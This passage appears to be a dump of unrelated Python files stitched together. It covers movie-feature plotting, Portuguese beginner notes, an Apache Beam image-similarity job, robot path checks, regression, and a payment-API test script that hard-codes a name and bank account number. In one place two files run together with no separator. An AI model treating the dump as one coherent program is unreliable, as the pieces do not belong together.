        top_10_topics_list = list(top_10_topics.index.values)
        #Save top 10 topics per genre in a dict
        genre_top_10_topics[genre] = top_10_topics_list
    top10_df = pd.DataFrame.from_dict(genre_top_10_topics)
    #Change index so the best topic for each genre gets assigned a 1 instead of a 0
    top10_df.set_index(np.arange(1,11,1), inplace=True)
    pd.DataFrame.to_csv(topic_average_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_topic_averages_per_genre.csv", sep="\t", index=None)
    pd.DataFrame.to_csv(top10_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_top10_topics_per_genre.csv", sep="\t")
    #########################
    #    Document length    #
    #########################
    #Create doclength dataframe and save it to csv
    doclength_average_df = pd.DataFrame.from_dict(genre_average_doclength, orient="index", columns=["avg_doclength"])
    pd.DataFrame.to_csv(doclength_average_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_doclength_averages_per_genre.csv")
    doclength_average_df.plot(kind="bar", legend=None, figsize=(7.5,5))
    plt.xlabel("Genres", fontsize="large")
    plt.xticks(rotation=45)
    plt.ylabel("Average number of words per movie")
    plt.yticks(np.arange(0,11000,1000))
    plt.tight_layout()
    # Fixed: "+" was missing between `sample` and the suffix here.
    plt.savefig(RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_genre_average_doclength.png")
    plt.show()
    #########################
    #  Syntactic features   #
    #########################
    #Create syntactic average dataframe and save it to csv
    syn_average_df = pd.DataFrame.from_dict(genre_average_syn)
    pd.DataFrame.to_csv(syn_average_df, RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_syntactic_averages_per_genre.csv")
    #Create ranked dataframe for easier visualization
    syn_ranked_df = syn_average_df.rank(method="max", ascending=True, axis=1)
    #Insert syntactic feature labels into the dataframe again, because they can't be inferred from the index itself using the parallel_coordinates function!
    syn_ranked_df["syns"] = syns
    #Create parallel_coordinates figure
    plt.figure(figsize=(7.5,5))
    pd.plotting.parallel_coordinates(syn_ranked_df, "syns", colormap="Dark2")
    plt.ylabel("Inverted rank", fontsize="large")
    plt.yticks(np.arange(1,16,2))
    plt.xlabel("Genres", fontsize="large")
    plt.xticks(rotation=45)
    plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=True)
    plt.tight_layout()
    plt.savefig(RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_genre_syn_parallel_plot.png", bbox_inches="tight")
    plt.show()
    #Pandas series with the average rank per genre, shown as a bar plot
    syn_avg_ranks = syn_ranked_df.mean()
    plt.figure(figsize=(7.5,5))
    syn_avg_ranks.plot(kind="bar", legend=None)
    plt.ylabel("Average inverted rank", fontsize="large")
    plt.xlabel("Genres", fontsize="large")
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.savefig(RESULT_DIR + "\\genre\\" + sample + "\\" + sample + "_genre_syn_average_ranks.png", bbox_inches="tight")
    plt.show()
def get_decade_averages(matrix_df):
    """Average topic distributions, syntactic measures and document length
    per decade; write csv summaries and save/plot summary figures under
    RESULT_DIR.

    Bug fix: an unrecognized ``sample`` previously left ``decade_list``
    unbound and crashed later with a NameError; now fails fast.
    """
    #Get the right list of decades depending on the used sample
    if sample == "sample_1930-2010" or sample == "sample_genre-based":
        decade_list = ["1930", "1940", "1950", "1960", "1970", "1980", "1990", "2000", "2010"]
    elif sample == "sample_1970-2010":
        decade_list = ["1970", "1980", "1990", "2000", "2010"]
    elif sample == "sample_2000-2010":
        decade_list = ["2000", "2010"]
    else:
        raise ValueError("Unknown sample: %s" % sample)
    syns = ["ADJCL", "CNPC", "CNPS", "DPPC", "MLC", "MLNP", "MLS", "NPPS","PASSPS","SCR"]
    decade_average_topics = {}
    decade_average_doclength = {}
    decade_top_10_topics = {}
    decade_average_syn = {}
    for decade in decade_list:
        #Cast on "int" is necessary because otherwise wrong types (int vs string) are compared
        decade_df = matrix_df.loc[matrix_df["decade"] == int(decade)]
        #Get topic columns and their means (columns 6..-10 hold the topics)
        topic_columns = decade_df.iloc[:, 6:-10]
        averaged_topics = topic_columns.mean()
        decade_average_topics[decade] = averaged_topics.to_dict()
        #Get syntactic columns and their means (last 10 columns)
        syn_columns = decade_df.iloc[:, -10:]
        averaged_syn = syn_columns.mean()
        decade_average_syn[decade] = averaged_syn.to_dict()
        #Get documentLength column and the mean for each decade
        doclength_column = decade_df.iloc[:,5]
        averaged_doclength = doclength_column.mean()
        decade_average_doclength[decade] = averaged_doclength
    ######################
    #   Topic averages   #
    ######################
    topic_average_df = pd.DataFrame.from_dict(decade_average_topics)
    for decade in decade_list:
        #Find rows with highest values for each decade
        top_10_topics = topic_average_df.nlargest(10, decade)
        #Find topic names in index of each row
        top_10_topics_list = list(top_10_topics.index.values)
        #Save top 10 topics per decade in a dict
        decade_top_10_topics[decade] = top_10_topics_list
    top10_df = pd.DataFrame.from_dict(decade_top_10_topics)
    #Change index so the best topic for each decade gets assigned a 1 instead of a 0
    top10_df.set_index(np.arange(1,11,1), inplace=True)
    pd.DataFrame.to_csv(topic_average_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_topic_averages_per_decade.csv", sep="\t", index=None)
    pd.DataFrame.to_csv(top10_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_top10_topics_per_decade.csv", sep="\t")
    #########################
    #    Document length    #
    #########################
    #Create doclength dataframe and save it to csv
    doclength_average_df = pd.DataFrame.from_dict(decade_average_doclength, orient="index", columns=["avg_doclength"])
    pd.DataFrame.to_csv(doclength_average_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_doclength_averages_per_decade.csv")
    doclength_average_df.plot(kind="bar", legend=None, figsize=(7.5,5))
    plt.xlabel("Decades", fontsize="large")
    plt.xticks(rotation=45)
    plt.ylabel("Average number of words per movie")
    plt.yticks(np.arange(0,11000,1000))
    plt.tight_layout()
    plt.savefig(RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_decade_average_doclength.png")
    plt.show()
    #########################
    #  Syntactic features   #
    #########################
    #Create syntactic average dataframe and save it to csv
    syn_average_df = pd.DataFrame.from_dict(decade_average_syn)
    pd.DataFrame.to_csv(syn_average_df, RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_syntactic_averages_per_decade.csv")
    #Create ranked dataframe for easier visualization
    syn_ranked_df = syn_average_df.rank(method="max", ascending=True, axis=1)
    #Insert syntactic feature labels into the dataframe again, because they can't be inferred from the index itself using the parallel_coordinates function!
    syn_ranked_df["syns"] = syns
    #Create parallel_coordinates figure
    plt.figure(figsize=(7.5,5))
    pd.plotting.parallel_coordinates(syn_ranked_df, "syns", colormap="Dark2")
    plt.ylabel("Inverted rank", fontsize="large")
    # NOTE(review): ranks run 1..len(decade_list) but the ticks stop one
    # short of the maximum — confirm this is intended.
    plt.yticks(np.arange(1,len(decade_list),1))
    plt.xlabel("Decades", fontsize="large")
    plt.xticks(rotation=45)
    plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=True)
    plt.tight_layout()
    plt.savefig(RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_decade_syn_parallel_plot.png", bbox_inches="tight")
    plt.show()
    #Pandas series with the average rank per decade, shown as a bar plot
    syn_avg_ranks = syn_ranked_df.mean()
    plt.figure(figsize=(7.5,5))
    syn_avg_ranks.plot(kind="bar", legend=None)
    plt.ylabel("Average inverted rank", fontsize="large")
    plt.xlabel("Decades", fontsize="large")
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.savefig(RESULT_DIR + "\\decade\\" + sample + "\\" + sample + "_decade_syn_average_ranks.png", bbox_inches="tight")
    plt.show()
def main(matrix_df):
    """Run both averaging analyses on the loaded feature matrix."""
    for analysis in (get_genre_averages, get_decade_averages):
        analysis(matrix_df)

main(matrix_df)
import matplotlib.pyplot as plt
import numpy as np
# 500 evenly spaced samples across one full period of sine.
x = np.linspace(-np.pi, np.pi, 500, endpoint=True)
y = np.sin(x)
plt.plot(x, y)

# Hide the top/right spines and move the remaining two to the data
# origin so the axes cross at (0, 0), with ticks on the visible sides.
ax = plt.gca()
for side in ('right', 'top'):
    ax.spines[side].set_color('none')
ax.spines['bottom'].set_position(('data', 0))
ax.spines['left'].set_position(('data', 0))
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
plt.show()
|
'''
dia = 3
mes = "Março"
ano = 2021
print("Eu faço aniversário em {} de {} de {}.".format(dia,mes,ano))
'''
# nome = "clarice"
# nome = nome.capitalize()
# print(nome) #resultado = Clarice
''' palavra = "alura"
palavra.upper()
print(palavra) #qual é o resultado? = alura '''
'''# coding: utf-8
frutas = ['Banana', 'Maca', 'Pera', 'Uva', 'Melancia', 'Jamelão']
fruta_pedida = input('Qual é a fruta que deseja consultar ?')
fruta_pedida = fruta_pedida.strip()
if(fruta_pedida in frutas):
print ('Sim, temos a fruta.')
else:
print ('Não temos a fruta.')
'''
'''precos = [1525,1120,1464,1200,1330,1356,1312,1531,1232, 1234,1250,1114,1553,1147,1303,1296,1309,1404,1479,1376,1152,1440,1038,1018,1291,1388,1577,1115,1488,1494,1254,1230,1122,1396,1208,1356,1549,1116,1443,1075,1536,1542,1036,1015,1020,1217,1484,1032,1390,1026 ]
print( min(precos)) # min() imprime o menor número da LISTA e max() o maior número da LISTA'''
'''funcionarios = ['Astrid','Flavia','Talia', ... ,'Mauricio', 'Waldemar', 'Marina']
print(funcionarios)
print(len(funcionarios)) # len() retorna o tamanho da lista'''
'''frutas = ['Banana', 'Morango', 'Maçã', 'Uva', 'Maçã', 'Uva']
print(frutas.index('Uva')) # RESULTADO = 3, volta o valor do índice do elemento na lista'''
'''frutas = ['Banana', 'Morango', 'Maçã', 'Uva']
fruta_buscada = 'Melancia'
if fruta_buscada in frutas:
print(frutas.index(fruta_buscada))
else:
print('Desculpe, a {} não está na lista frutas'.format( fruta_buscada))
#Assim temos certeza que a fruta_buscada está dentro da lista antes de
#perguntarmos o seu índice, evitando assim de receber um erro no console.
'''
'''valores = ["a","b","c","d","e"]
del(valores[0]) #funciona pois é lista, não funciona com tupla
print(valores) #resultado é a retirada do A'''
'''#list usa colchetes [] para inicialização, tuple usa parênteses ()
#list é mutável, tuple é imutável
#Entre essas sequências, list é a única que é mutável. tuple, str e range são imutáveis.
# Range se comporta como tuples e strs.
lista = [4,3,2,1]
tuple = (4,3,2,1)'''
'''#tupla e lista permitem elementos duplicados, então ao usar chaves { }, não é possível duplicar elementos
#isto se chama set, set não é uma sequência, pois não tem índice, assim,
#ao fazer print, os elementos aparecem desordenados
colecao = {11122233344, 22233344455, 33344455566}
colecao.add(4455663388) #adicionar mais um elemento à coleção
print(colecao)'''
''' #A estrutura abaixo é um Dictionary. No lado esquerdo a chave e no lado direito o valor.
#Isso ajuda quando não sabemos um índice de um elemento, mas podemos buscá-lo pela
#nome (a chave em dicionário), como no caso abaixo:
instrutores = {'Nico' : 39, 'Flavio': 37, 'Marcos' : 30}
print(instrutores['Flavio'])'''
'''total = 0
palavra = "python rocks!"
acabou = False
while (not acabou):
acabou = (total == len(palavra))
total = total + 1
print(total-1)
# Por que (total - 1)????
#Pois na ultima execução ele verificara que total ==len(palavra) e em seguida
#fara novamente a soma total +1, para então sair do loop, o que vai fazer com
#que total seja igual ao tamanho da palavra mais 1 e para que seja exibido
#corretamente esse 1 deve ser subtraído'''
# List Comprehension
#
# frutas = ["maçã", "banana", "laranja", "melancia"]
# lista = [fruta.upper() for fruta in frutas]
# print(lista)
# inteiros = [1,3,4,5,7,8]
# quadrados = [n*n for n in inteiros]
# print(quadrados)
inteiros = [1,3,4,5,7,8,9]
pares = [numero for numero in inteiros if numero%2 == 0]
print(pares)
|
import sys
import os
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.options.pipeline_options import PipelineOptions
import apache_beam as beam
from logging import basicConfig, getLogger, INFO
# Root logger configuration shared by the whole job.
basicConfig(level=INFO, format='%(asctime)-15s %(levelname)s %(filename)-s:%(lineno)-s: %(message)s')
logger = getLogger(__name__)
# Convenience shorthand for logger.info.
info = lambda x: logger.info(x)
from util import (
    get_runner,
    default_args
)
__version__ = "0.0.2"
# NOTE(review): dots are replaced with dashes in the job name —
# presumably because the runner rejects dots; verify.
JOB_NAME = "pixai-similarity-task-" + __version__.replace(".", "-")
PROJECT_ID = "topgate-ai-dev"
# GCS bucket holding the input list, the image tarball and result csvs.
BUCKET_NAME = PROJECT_ID + "-df"
class TransformDoFn(beam.DoFn):
    """Beam DoFn that compares image pairs and uploads one csv per pair."""
    def start_bundle(self):
        """Download and extract the image tarball once per bundle."""
        from util import download_file
        if not os.path.exists("input"):
            try:
                os.mkdir("input")
                os.mkdir("image")
                os.mkdir("output")
            except:
                # Directories may already exist on a reused worker.
                pass
        big = "input/nadesico2.tar"
        try:
            download_file("gs://"+BUCKET_NAME+"/"+big, ""+big)
            self.extract(big , "image")
        except:
            # Single retry on any failure (e.g. transient GCS error).
            download_file("gs://"+BUCKET_NAME+"/"+big, ""+big)
            self.extract(big , "image")
    def process(self, element):
        """Compare one "path1,path2" pair and upload the result csv.

        element: a line of the input text file, "truth_path,scale_path".
        """
        from similarity import compare_image
        from util import upload_file
        import pandas as pd
        # Placeholder values (0..6) in case both comparison attempts fail.
        res1, res2, res3, res4, res5, w, h = range(7)
        el1, el2 = element.strip().split(",")
        pel1 = "" + el1
        pel2 = "" + el2
        try:
            res1, res2, res3, res4, res5, w, h = compare_image(pel1, pel2)
        except Exception as e:
            print(e)
            print(e)
            # Retry once; repeated failure keeps the placeholder values.
            try:
                res1, res2, res3, res4, res5, w, h = compare_image(pel1, pel2)
            except Exception as e:
                print(e)
                print(e)
        row = pd.DataFrame([[el1, el2, res1, res2, res3, res4, res5, w, h]], columns=["truth", "scale", "ssim", "nssim", "ssim2", "nssim2", "psnr", "width", "height"])
        print(row)
        # One csv per pair, named after both base file names.
        path = os.path.basename(el1) + "_" + os.path.basename(el2)
        path = os.path.join("output", path)
        csvpath = path + ".csv"
        row.to_csv(csvpath, index=None, header=None)
        upload_file("gs://"+BUCKET_NAME+"/"+csvpath, csvpath)
        print("Task finished: " + csvpath)
    def extract(self, f, path):
        """Extract tarball *f* into directory *path*."""
        import tarfile
        tar = tarfile.open(f)
        tar.extractall(path)
        tar.close()
def run(args):
    """Build and launch the Beam pipeline that scores image similarity."""
    print(args)
    # NOTE(review): hard-codes the worker count, overriding any CLI value.
    args.num_workers = 1000
    options = PipelineOptions.from_dictionary(vars(args))
    print(options)
    # run pipeline
    inputtext = "gs://{}/input/nadesico2.txt".format(BUCKET_NAME)
    #outputtext = "gs:///output/nadesico2.csv".format(BUCKET_NAME)
    print(args)
    p = beam.Pipeline(get_runner(args.cloud), options=options)
    # Each input line is a "path1,path2" pair handled by TransformDoFn.
    (p | 'read' >> ReadFromText(inputtext)
       | 'transform' >> beam.ParDo(TransformDoFn())
    )
    # Fire and forget; the commented variant below would block instead.
    p.run()
    #p.run().wait_until_finish()
if __name__ == "__main__":
    run(default_args(sys.argv[1:], JOB_NAME, PROJECT_ID, BUCKET_NAME))
|
from params import *
from intersectionarc import *
from calculrayoncourbure import *
def cibleatteignable(segments,p,v):
    """Decide whether target point p is reachable at speed v along a
    circular arc without hitting any obstacle segment.

    Returns (reachable_flag, radius, side_sign, Rmin) — except the
    yp == 0 straight-line case, which returns only 3 elements.
    NOTE(review): confirm callers handle both arities.
    """
    # Unpack the global parameter vector provided by params().
    [positioninit1,positioninit2,orientationinit1,orientationinit2,vinit1,vinit2,deltat,amaxlat,epsilonmax,amax,amin,tsb,l,larg,vmax,N,rv,m,alpha,lanti]=params()
    # Minimum turn radius from the lateral-acceleration and steering limits.
    Rminamaxlat=v**2/amaxlat
    Rminepsilonmax=tsb*v**2/(epsilonmax*pi/180)+l/(epsilonmax*pi/180)
    Rmin=max(Rminamaxlat,Rminepsilonmax)
    # Upper bound derived from the curvature radius at p.
    Rmax=abs(calculrayoncourbure(p))/4
    xp=p[0]
    yp=p[1]
    Ns=len(segments)
    K=0
    if xp!=0:
        # Slope of the line from the origin to the target.
        K=yp/xp
    # Side of the x-axis the target lies on (+1 above, -1 below).
    sgyp=1
    if yp<0:
        sgyp=-1
    if Rmin>Rmax:
        # No feasible radius at all.
        return(0,Rmax,sgyp,Rmin)
    # Candidate radii, evenly spaced between Rmin and Rmax.
    R=[]
    Nr=100
    i=0
    while i<Nr:
        R.append(Rmin+i*(Rmax-Rmin)/(Nr-1))
        i+=1
    i=0
    while i<Nr:
        r=R[i]
        yc=sgyp*r
        if yp==0:
            return(1,Rmax,1) #go in a straight line
        if xp!=0:
            # Intersection of the arc's circle with the origin-to-p line.
            xinter=(-2*K*yc)/(1+K**2)
            yinter=K*xinter
            j=0
            # Test the intersection point against every obstacle segment.
            while j<Ns and intersectionarc([xinter,yinter],segments[j])!=1:
                j+=1
            if j==Ns:
                return(1,r,sgyp,Rmin)
            return(0,r,sgyp,Rmin)
        # xp == 0: the arc meets the vertical axis at the circle's far point.
        xinter=0
        yinter=sgyp*2*r
        theta=180
        j=0
        while j<Ns and intersectionarc([xinter,yinter],segments[j])!=1:
            j+=1
        if j==Ns:
            return(1,r,sgyp,Rmin)
        return(0,r,sgyp,Rmin)
        # NOTE(review): every branch above returns on the first iteration,
        # so this increment is unreachable and only R[0] is ever tested —
        # looks like a bug; confirm intended behavior.
        i+=1
|
def palindrome():
    """Return the smallest integer >= 9 whose decimal and binary forms
    both pass the half-slice palindrome test below (313).

    NOTE(review): ``s[len(s):len(s) // 2:-1]`` yields one character fewer
    than the first half for even-length strings, so even-length
    representations can never match — only odd-length palindromes
    qualify.  This quirk is preserved from the original Python 2 code
    (which relied on integer ``/``); confirm before "fixing" it to a
    plain ``s == s[::-1]`` check, which would change the result.
    """
    number = 9
    while True:
        dec = str(number)
        binary = bin(number)[2:]
        # The original also looped over trial divisors of ``number``, but
        # i == 1 always divides, so that loop never changed the outcome
        # and has been dropped.
        if (dec[:len(dec) // 2] == dec[len(dec):len(dec) // 2:-1]
                and binary[:len(binary) // 2] == binary[len(binary):len(binary) // 2:-1]):
            return number
        number += 1

a = palindrome()
print(a)  # Python 3 print; the original used the Python 2 statement form
|
import csv
import sys
import numpy as np
import matplotlib.pyplot as plt
def checkArgs():
    """Parse CLI arguments: train csv path, test csv path, learning rate.

    Exits with a usage message on a wrong argument count or a
    non-numeric eta.  Returns (train_file, test_file, eta).
    (Converted from Python 2 print statements; also fixed: a bad eta
    previously fell through and raised NameError on the return.)
    """
    if (len(sys.argv) != 4):
        print("Please enter three arguments. For instance, run: "
              "\npython lr.py train.csv test.csv 0.005")
        exit(0)
    train_file = sys.argv[1]
    test_file = sys.argv[2]
    try:
        _eta = float(sys.argv[3])
    except ValueError:
        print("Please enter a float for the eta argument")
        exit(0)  # bug fix: don't fall through with _eta unbound
    return train_file, test_file, _eta
def readCSV(csv_file):
    """Read a csv file into ``{header: [values...]}`` plus the ordered
    header list.

    Returns (data, parameters) where ``parameters`` is the fieldname
    list in file order and every value is kept as a string.
    """
    # newline="" is the csv-module recommended way to open files; the
    # old Python 2 'rU' universal-newline mode was removed in 3.11.
    with open(csv_file, newline='') as infile:
        # read the file as a dictionary for each row ({header : value})
        reader = csv.DictReader(infile)
        parameters = reader.fieldnames
        data = {}
        for row in reader:
            for header, value in row.items():
                data.setdefault(header, []).append(value)
    return data, parameters
def gradientDescent(X, W, maxIterations=100000, Y=None, N=None, eta=None):
    """Batch gradient descent for linear least squares.

    X: (N, k+1) design matrix; W: initial weight vector.
    Y, N and eta default to the module-level globals ``Y``, ``N`` and
    ``_eta`` for backward compatibility with the original script-style
    call ``gradientDescent(X, W)``; passing them explicitly makes the
    function self-contained and testable.
    Returns the fitted weight vector.
    (Fixed: ``xrange`` is Python 2 only.)
    """
    if Y is None:
        Y = globals()["Y"]
    if N is None:
        N = len(Y)
    if eta is None:
        eta = globals()["_eta"]
    prev_cost = 0.0
    for _ in range(maxIterations):
        F = np.dot(X, W)
        loss = F - Y
        cost = np.sum(loss ** 2) / (2 * N)
        # Stop once the cost has effectively converged.
        if (np.abs(prev_cost - cost) < 0.00000000000001):
            break
        prev_cost = cost
        gradient = np.dot(X.transpose(), loss) / N
        W = W - eta * gradient
    return W
def plotGraph(X, Y, W):
    """Scatter the sqft_lot feature against price and overlay the fitted
    regression line W[0] + W[1] * x between x = 0 and x = 16."""
    # Two points on the fitted line, at the left and right plot edges.
    left_x, right_x = 0, 16
    left_y = W[0]
    right_y = W[1] * (right_x - left_x) + W[0]

    feature = np.array(X).transpose()[1]
    plt.scatter(feature, Y)
    plt.title('sqft_lot vs price')
    plt.xlabel('sqft_lot (x10^5)')
    plt.ylabel('price (x10^5)')

    # Mark the two line endpoints prominently, then connect them.
    plt.scatter([left_x, right_x], [left_y, right_y], marker='.', s=150, c='r')
    plt.plot([left_x, right_x], [left_y, right_y], c='r')
    plt.show()
if __name__ == '__main__':
    # Parse CLI args, load the training data, fit and plot.
    train_file, test_file, _eta = checkArgs()
    train_data, parameters = readCSV(train_file)
    # Prepare actual output vector (prices scaled down by 1e5).
    # Dimensions Nx1
    Y = [float(x) / 100000 for x in train_data['price']]
    Y = np.array(Y)
    # Number of data points
    N = len(Y)
    # Number of input parameters
    k = 1
    # Prepare input matrix X.
    X = [[0]] * (k + 1)
    # Setting x_i_1 to 1 for all x_i (bias column)
    X[0] = [1] * N
    # for i in xrange(1, k + 1):
    #     X[i] = ...
    X[1] = [float(x) / 100000 for x in train_data['sqft_lot']]
    # Dimensions Nx(k+1)
    X = np.array(X).transpose()
    # Initialising linear predictors, w = [w1, w2]
    # Hypothesis- f(x) = w1 + w2*x
    # Dimensions (k+1)x1
    W = [0] * (k + 1)
    W = np.array(W)
    W = gradientDescent(X, W)
    print(W)  # bug fix: was the Python 2 `print W` statement
    plotGraph(X, Y, W)
|
#coding:utf-8
import json
import random
import request
import time
print('####################创建协议开始##################')
## Request parameters for creating a protocol
data1 = {"transDesc":"test1","businessId":"2","channelType":"LFT"}
# Endpoint for creating a protocol
url1 = 'http://172.29.66.21:80/api/protocol/create'
# Bug fix: the original called request.rzequest (typo) — every other
# call in this script uses request.request.
t1 = request.request(url1, data1)
sss1 = json.loads(t1)
ss11 = sss1['data']
ss1 = json.loads(ss11)
transNo = ss1['transNo']
print('transNo:'+transNo,'amount:'+ss1['amount'],'onpassageAmount:'+ss1['onpassageAmount'],'outAmount:'+ss1['outAmount'])
print('####################创建协议结束##################')
print('####################查询协议开始##################')
## Request parameters for querying a protocol
data2 = {"transNo":transNo}
# Endpoint for querying a protocol
url2 = 'http://172.29.66.21:80/api/protocol/find'
t2 = request.request(url2, data2)
sss2 = json.loads(t2)
ss21 = sss2['data']
ss2 = json.loads(ss21)
print('transNo:'+transNo,'amount:'+ss2['amount'],'onpassageAmount:'+ss2['onpassageAmount'],'outAmount:'+ss2['outAmount'])
print('####################查询协议结束##################')
print('####################入金生成POS六位码开始##################')
## Request parameters for generating the six-digit POS deposit code
no = random.randint(1000000000,9999999999)
outReqNo = '10005'+str(no)
amount = '1000.00'
outArrivedNotifyUrl = 'www.baidu.com'
outSuccessNotifyUrl = 'www.baidu.com'
transNo = transNo
prodCatalog = '01'
data3 = {"outReqNo":outReqNo,"amount":amount,"outArrivedNotifyUrl":outArrivedNotifyUrl,"outSuccessNotifyUrl":outSuccessNotifyUrl,"transNo":transNo,"prodCatalog":prodCatalog}
# Endpoint for generating the POS code
url3 = 'http://172.29.66.21:80/api/protocol/prepay'
t3 = request.request(url3, data3)
sss3 = json.loads(t3)
ss31 = sss3['data']
ss3 = json.loads(ss31)
outReqNo = ss3['outReqNo']
print('transNo:'+transNo,'amount:'+ss3['amount'],'outReqNo:'+ss3['outReqNo'],'posCode:'+ss3['posCode'],'payStatus:'+ss3['payStatus'])
print('####################入金生成POS六位码结束##################')
print('####################等待入金状态更新######################')
time.sleep(60)
# print('####################入金关闭POS六位码开始##################')
# ##入金关闭POS六位码入参
# data4 = {"outReqNo":outReqNo}
# #入金关闭POS六位码请求地址
# url4 = 'http://172.29.66.21:80/api/protocol/posclose'
#
# t4 = request.request(url4,data4)
#
# # sss4 = json.loads(t4)
# # ss41 = sss4['data']
# # ss4 = json.loads(ss41)
# # print('transNo:'+transNo,'amount:'+ss4['amount'],'onpassageAmount:'+ss4['onpassageAmount'],'outAmount:'+ss4['outAmount'])
#
# print('####################入金关闭POS六位码结束##################')
# Poll the deposit status every 10 seconds until it leaves UNPAID.
flag = 1
while flag:
    print('####################入金查询开始##################')
    ## Request parameters for the deposit query
    data5 = {"outReqNo":outReqNo}
    # Endpoint for the deposit query
    url5 = 'http://172.29.66.21:80/api/protocol/inquery'
    t5 = request.request(url5, data5)
    sss5 = json.loads(t5)
    ss51 = sss5['data']
    ss5 = json.loads(ss51)
    print('transNo:'+transNo,'amount:'+ss5['amount'],'outReqNo:'+ss5['outReqNo'],'posCode:'+ss5['posCode'],'payStatus:'+ss5['payStatus'],'arrivedStatus:'+ss5['arrivedStatus'])
    print('####################入金查询结束##################')
    time.sleep(10)
    if ss5['payStatus'] != 'UNPAID':
        flag = 0
print('####################出金或退款开始##################')
## Request parameters for withdrawal or refund
transNo = transNo
outReqNo = outReqNo
amount = '100.00'
channelType = 'LFT'
outNotifyUrl = 'www.baidu.com'
bankAccName = '李冉'
bankAccNum = '4349849854'
bankName = '中国银行'
bankCnaps = '100010'
outType = 'OUT'
remark = '付款描述'
data6 = {"transNo":transNo,"outReqNo":outReqNo,"amount":amount,"channelType":channelType,"outNotifyUrl":outNotifyUrl,"bankAccName":bankAccName,"bankAccNum":bankAccNum,"bankName":bankName,"bankCnaps":bankCnaps,"outType":outType,"remark":remark}
# Endpoint for withdrawal/refund
url6 = 'http://172.29.66.21:80/api/protocol/outpay'
t6 = request.request(url6, data6)
sss6 = json.loads(t6)
ss61 = sss6['data']
ss6 = json.loads(ss61)
outReqNo = ss6['outReqNo']
print('transNo:'+transNo,'amount:'+ss6['amount'],'outReqNo:'+ss6['outReqNo'],'outType:'+ss6['outType'],'payStatus:'+ss6['payStatus'])
print('####################出金或退款结束##################')
print('####################出金或退款查询开始##################')
## Request parameters for the withdrawal/refund query
data7 = {"outReqNo":outReqNo}
# Endpoint for the withdrawal/refund query
url7 = 'http://172.29.66.21:80/api/protocol/outquery'
t7 = request.request(url7, data7)
sss7 = json.loads(t7)
ss71 = sss7['data']
ss7 = json.loads(ss71)
print('transNo:'+transNo,'amount:'+ss7['amount'],'outReqNo:'+ss7['outReqNo'],'outType:'+ss7['outType'],'payStatus:'+ss7['payStatus'])
print('####################出金或退款查询结束##################')
print('####################联行号查询开始##################')
## Request parameters for the CNAPS (bank routing number) lookup
data8 = {"bankNameKeyWord":'海淀'}
# Endpoint for the CNAPS lookup
url8 = 'http://172.29.66.21:80/api/protocol/querybankcnaps'
t8 = request.request(url8, data8)
# sss8 = json.loads(t8)
# ss81 = sss8['data']
# ss8 = json.loads(ss81)
# print('transNo:'+transNo,'amount:'+ss8['amount'],'outReqNo:'+ss8['outReqNo'],'outType:'+ss8['outType'],'payStatus:'+ss8['payStatus'])
print('####################联行号查询结束##################')
import numpy as np, os, multiprocessing, time
import myClass as STUC
# Dataset root for this run.
ROOT = "new-data/russian/2016/"
# Time-interval (tau) values defined by the project's myClass module.
TI = STUC.TI
# .item(0) unwraps the dict stored inside a 0-d numpy object array.
Sess_dict = np.load(ROOT+"Sess_dict.npy").item(0)
''' the data structure of complex topic pattern
ldaStr=tuple(gamma),tau=tau,prob_list=Supp_gamma_tau[tau],supp=average,l=gamma_len,contain=tuple([tuple(gamma)])'''
def getWhole_STP(STPSUPP_dict):
    """Collect every distinct pattern signature across all users and
    assign each a column index.

    STPSUPP_dict: {uid: [stp, ...]} where each stp exposes .ldaStr,
    .len and .contain.  Returns {(ldaStr, len, contain): column_index}.

    Bug fixes: the original computed ``set(coll_stp_supp)`` BEFORE the
    loop populated ``coll_stp_supp``, so it always returned an empty
    mapping; it also keyed on ``stp.ldaStr`` directly while transform()
    looks up ``tuple(stp.ldaStr)`` — the tuple form is used here so both
    agree.
    """
    coll_stp_supp = []
    for uid in sorted(STPSUPP_dict.keys()):
        coll_stp_supp.extend(
            (tuple(stp.ldaStr), stp.len, stp.contain) for stp in STPSUPP_dict[uid]
        )
    # Deduplicate, then enumerate to get stable column positions.
    return {key: i for i, key in enumerate(set(coll_stp_supp))}
def transform(uid_list, tau_stp_supp):
    """Build the (user x pattern) support matrix for one tau bucket.

    uid_list: sorted user ids; tau_stp_supp: {uid: [stp, ...]}.
    Returns a float32 matrix where cell (i, j) holds the support of
    pattern j for user i, and 0 where the user lacks the pattern.
    """
    PHI = getWhole_STP(tau_stp_supp)
    uid_phi_MAT = np.zeros((len(uid_list), len(PHI)), np.float32)
    for i, uid in enumerate(uid_list):
        if uid in tau_stp_supp.keys():
            # set() deduplicates repeated patterns for the same user.
            for stp in set(tau_stp_supp[uid]):
                key = (tuple(stp.ldaStr), stp.len, stp.contain)
                try:
                    index = PHI[key]
                except:
                    # Pattern key missing from PHI — report and skip.
                    print(uid, key)
                else:
                    uid_phi_MAT[i][index] = stp.supp
    return uid_phi_MAT
''' Store all patterns by user id according to the value of time-interval (tau)
TISTP_dict is a dict: key1=tau key2=user id value=CTP(seq) '''
def file2dict(input_dir,output_dir):
    """Group each user's mined patterns by tau and save one dict per tau.

    Reads per-user "TP_dict_<uid>.npy" files from input_dir and writes
    one "TP_dict_<tau>.npy" ({uid: [stp, ...]}) per tau to output_dir.
    """
    CTP4tau_dict = {tau: {} for i, tau in enumerate(TI)}
    file_list = os.listdir(input_dir)
    # File names look like "TP_dict_<uid>.npy"; recover the uid suffix.
    idlist=list(map(str, [name[:-4].split("_")[-1] for name in file_list]))
    for uid in sorted(idlist):
